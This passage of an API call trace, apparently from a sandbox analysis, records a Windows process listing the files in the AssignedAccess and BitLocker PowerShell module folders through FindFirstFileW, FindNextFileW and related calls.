ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592970 [0176.791] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.791] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0176.791] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0176.792] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0176.792] FindNextFileW (in: hFindFile=0x1a592970, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.792] FindClose (in: hFindFile=0x1a592970 | out: hFindFile=0x1a592970) returned 1 [0176.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.792] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0176.792] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42 [0176.792] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.793] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.793] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0176.793] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0176.793] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0176.793] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0176.793] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.794] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0176.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.794] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0176.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.794] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0176.794] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\", lpFilePart=0x0) returned 0x42 [0176.794] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.794] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.795] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0176.795] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0176.795] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0176.795] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.795] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.795] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0176.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.796] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0176.796] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d [0176.796] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.815] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.815] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0176.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0176.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0176.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0176.816] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 0 [0176.816] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.817] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0176.817] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d [0176.818] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0176.819] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.819] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.819] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0176.819] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0176.819] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0176.819] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0176.820] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.820] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0176.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.821] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0176.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.821] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.821] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0176.821] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d [0176.821] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, 